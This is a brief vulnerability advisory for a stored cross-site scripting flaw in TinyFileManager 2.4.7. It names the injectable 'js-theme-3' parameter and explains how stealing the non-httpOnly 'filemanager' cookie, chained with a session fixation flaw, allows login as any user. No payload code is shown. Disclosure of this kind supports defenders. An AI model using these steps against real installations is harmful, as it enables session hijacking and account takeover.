TinyFileManager Stored Cross-Site Scripting Vulnerability

A stored cross-site scripting vulnerability has been identified in TinyFileManager version 2.4.7, specifically within the '/tinyfilemanager.php' component. This vulnerability allows attackers to execute arbitrary JavaScript or HTML by injecting a crafted payload into the 'js-theme-3' parameter.

Impact

Exploitation of this vulnerability allows for the execution of injected scripts, which can run across the entire page, including the login screen. The 'filemanager' cookie, used as the session ID, is vulnerable to hijacking because it lacks the httpOnly flag. This vulnerability, combined with a previously reported session fixation vulnerability in TinyFileManager, could enable an attacker to log in as any user by using a fixed 'filemanager' cookie value.

Reproduction

To reproduce this vulnerability, navigate to the Settings page and inject a payload into the 'js-theme-3' parameter. The injected script will execute immediately, demonstrating the cross-site scripting vulnerability.